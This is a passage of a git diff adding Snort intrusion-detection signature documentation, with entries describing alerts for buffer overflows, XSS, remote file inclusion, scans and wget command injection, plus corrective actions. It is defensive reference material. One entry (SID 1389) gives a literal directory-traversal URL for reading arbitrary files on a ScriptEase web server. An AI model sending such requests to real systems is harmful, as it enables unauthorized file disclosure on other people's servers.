+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/110-1.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+110-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically a cgi null
+attack was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2810.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2810
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2035.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2035
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate wether a host is up or 
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and wether rpc 
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
--- /dev/null
+++ b/doc/signatures/100000667.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000667
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "files.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "files.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000554.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000554
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "tid" parameter in the "error.php" script used 
+by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/3312.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3312
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1330.txt
@@ -0,0 +1,50 @@
+Rule:
+
+--
+Sid:
+1330
+
+--
+Summary:
+Attempted wget command access via web
+
+--
+Impact:
+Attempt to gain information using wget to access sensitive files on a webserver.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence from sensitive system files on a webserver. Wget is GNU software that allows for retrieval of files uing HTTP, HTTPS and FTP. The attacker could possibly gain information needed for other attacks on the system, including the retrieval of password files from a third party onto the target webserver.
+
+Using "wget", the attacker may be able to upload an exploit, IRC daemon or DDoS agent onto the server. The rule looks for the "wget" command in the URL part of the client to web server connection and does not indicate whether the command was actually successful in uploading or downloading the files. The presence of the "wget" command in the URL indicates that an attacker attempted to trick the web server into executing system commands in non-interactive mode i.e. without a valid shell session. Another case when this rule might trigger is unencrypted HTTP tunneling connection to the server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains the path to wget and commands for wget in the URI, which can then return requested files to an external destination or onto the target server.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/980.txt
@@ -0,0 +1,63 @@
+Rule:
+
+
+--
+Sid:
+980
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of a file on an host running Stalkerlab's CGIMail server. 
+
+--
+Impact:
+Intelligence gathering activity.  This attack can display the contents of a file on the server.
+
+--
+Detailed Information:
+
+Stalkerlab's CGIMail is a CGI program that permits an HTTP server to send SMTP mail using the data from the HTLM form.  A vulnerability exits in the CGImail.exe program that can disclose the contents of files on the web server.  This can be accomplished by locally modifying the Web page that sends data to the SMTP server.  The modifications would include setting specific variable values to file names that the attacker wishes to examine.  
+
+
+--
+Affected Systems:
+Hosts running Stalkerlab CGIMail 1.1.2 
+
+--
+Attack Scenarios:
+An attacker can modify an HTML form used by Stalkerlab CGIMail that passes data to the SMTP server.  This can permit disclosure of file contents on the server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+No known remedy or patch is available.
+ 
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1623
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0726
+
+--
--- /dev/null
+++ b/doc/signatures/1228.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1228
+
+--
+Summary:
+A nmap XMAS scan was detected.
+
+--
+Impact:
+System reconnaissance that may include open/closed/firewalled ports,
+ACLs.
+
+--
+Detailed Information:
+Nmap sets the URG PSH and FIN bits as part of it's XMAS scan.
+Typically, a closed port will respond with an ACK RST, whereas an open
+port may not respond at all.  However, this varies from machine to
+machine, and also depends on what (if any) filtering policies are in
+place between the hosts in question.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+As part of information gathering that may occur before a more
+dedicated attack, an attacker may choose to use nmap's XMAS scan to
+determine open/closed ports.
+
+__
+Ease of Attack:
+Trivial.  Nmap is freely available to anyone who wishes to use it.
+The only requirement is root/elevated privledges (the XMAS scan
+requires this) and a lack of proper filtering between the two
+machines.
+
+--
+False Positives:
+None Known. The FIN PSH and URG flags should never be seen together
+in normal TCP traffic.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine what ports may have responded as being open, and what clues
+that may give an attacker relating to potential attacks.
+Additionally, investigate the use of proper ingress/egress filtering.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+SANS:
+http://rr.sans.org/firewall/egress.php
+
+--
--- /dev/null
+++ b/doc/signatures/353.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+353
+
+--
+Summary:
+This event is generated when a remote user attempts to anonymously log into an internal FTP server with a suspicious password, indicating that an attacker may be scanning the FTP server for vulnerabilities using the ADMhack scanning tool.
+
+--
+Impact:
+Information gathering, possible unauthorized access. 
+
+--
+Detailed Information:
+ADMhack is a security scanner that scans for exploitable network vulnerabilities. When the scanner encounters an FTP server, it attempts to log in using "ddd@ " as a password.
+ 
+--
+Affected Systems:
+Computers running anonymous FTP servers.
+
+--
+Attack Scenarios:
+An attacker scans the network for vulnerable FTP servers using ADMhack scanner. When an FTP server is found, the tool attempts to log into the server. If vulnerabilities exist on the server, this may allow the attacker access to the FTP server in order to exploit them. 
+
+--
+Ease of Attack:
+Simple. ADMhack is freely available on the Internet.
+
+--
+False Positives:
+If a legitimate remote anonymous user uses the same password, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1794.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1794
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "masturbation".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "masturbation".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/919.txt
@@ -0,0 +1,62 @@
+SID:
+919
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2384.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2384
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/120-1.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 
+120-1
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+presence of a web server running on a non-defined port.
+
+Web server ports are defined in snort.conf as the variable $HTTP_PORTS
+and also in the section for http_inspect. When a server is accessed on a
+port not defined in snort.conf the presence of web traffic generates an
+event. This may indicate the presence of an unauthorized web server.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios: 
+A web server may be used to transfer files from inside the protected
+network to unauthorized recipients on the outside.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors: 
+Daniel Roelker <droelker@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/1071.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+1071
+
+--
+Summary:
+This event is generated when an attempt is made to get a .htpasswd file from an HTTP server.
+
+--
+Impact:
+Serious. Although .htpasswd files cannot be accessed through the Apache HTTP service by default.
+
+--
+Detailed Information:
+The Apache HTTP server provides an authentication mechanism using .htaccess files and .htpasswd files.
+
+These files contain authentication information and encrypted passwords. However, older versions of Apache HTTPD for Windows systems the password might be stored in plaintext.
+
+In the default configuration, Apache HTTP server blocks any attempt to access .htaccess or .htpasswd files.
+
+--
+Attack Scenarios:
+The attacker could make a request to retrieve the .htpasswd file then use the information in it to launch a dictionary attack based on the usernames found.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+The .htpasswd file should be stored in a location outside the DocumentRoot for the webserver.
+
+The default configuration should include the following section to prevent access to .ht files:
+
+<Files ~ "^\.ht">
+    Order allow,deny
+    Deny from all
+</Files>
+
+Ensure the passwords stored in .htpasswd are encrypted.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1635.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1635
+
+--
+Summary: 
+This event is generated when an attempt is made to exploit a potential 
+buffer overflow using the APOP command.  If running a vulnerable mail 
+server, such as older XMail versions, this attack may lead to remote 
+execution of arbitrary code.
+--
+Impact:
+When succesfully exploited, the remote attacker can crash the POP3
+service or execute arbitrary code on the mailserver.
+--
+Detailed Information:
+The APOP command, used to submit authentication credentials to the POP3 
+server, has an overflowable buffer in XMail 0.58 and earlier.  If an 
+argument to the APOP command is longer than 256 characters, the service 
+will crash.  This error may be exploitable further, and could then allow
+the attacker to execute arbitrary code on the remote system.
+
+--
+Affected Systems:
+	XMail 0.58 or earlier
+
+--
+Attack Scenarios:
+An attacker could crash the POP server, thereby denying
+legitimate users access to their e-mail.  Skilled attackers could
+compromise the mailserver and obtain all incoming e-mail data.
+
+--
+Ease of Attack:
+The DoS attack is trivial to execute, as only an argument
+longer than 256 characters needs to be submitted.  Compromise of the
+mailserver requires more skill, but has been proven to be possible..
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the XtraMail installation to a more recent
+version.  The most recent versions can always be found on the vendor's
+website, http://www.xmailserver.org/
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck (maarten@daemon.be)
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10559
+
+Bugtraq
+http://www.securityfocus.com/bid/1652
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0841
+
+--
--- /dev/null
+++ b/doc/signatures/1839.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1839
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1389.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+1389
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+script viewcode.jse.
+
+--
+Impact:
+Information disclosure. An attacker may have been able to read the
+contents of any file on the web server.
+
+--
+Detailed Information:
+Nombas ScriptEase WebServer Edition is a Javascript environment for web
+servers.  As shipped, it comes with a sample script called "viewcode.jse"
+that contains a vulnerability.  This vulnerability allows an attacker
+to view any file on the web server.  The web server that ships with
+Novell Netware 5.1 before SP3 contains this vulnerability.
+
+--
+Affected Systems:
+	Netware 5.1 and Nombas ScriptEase WebServer Edition
+ 
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following:
+http://target/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/somefile
+
+--
+Ease of Attack:
+Simple handcrafted URL.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a malicious web request was being done.
+Try to determine what the requested file was, and determine
+from the web server's configuration whether it was a threat or not
+(e.g., whether the requested file even existed and whether the web
+server contained the viewcode.jse sample script).  The existence of
+sample scripts on a web server may indicate larger vulnerabilities.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/111-13.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+111-13
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a stealth scan is in progress. That is, packets with both the SYN and FIN
+flags set have been detected. This is not normal behavior in TCP
+connections.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/369.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+369
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a BayRS Router.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a BayRS router contains a unique payload in the message request.  
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+
+Original rule written by Doug@Minderhout.com  
+Modified by Brian Caswell <bmc@sourcefire.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.whitehats.com/info/IDS444
+
+--
--- /dev/null
+++ b/doc/signatures/3099.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3099
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3352.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3352
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
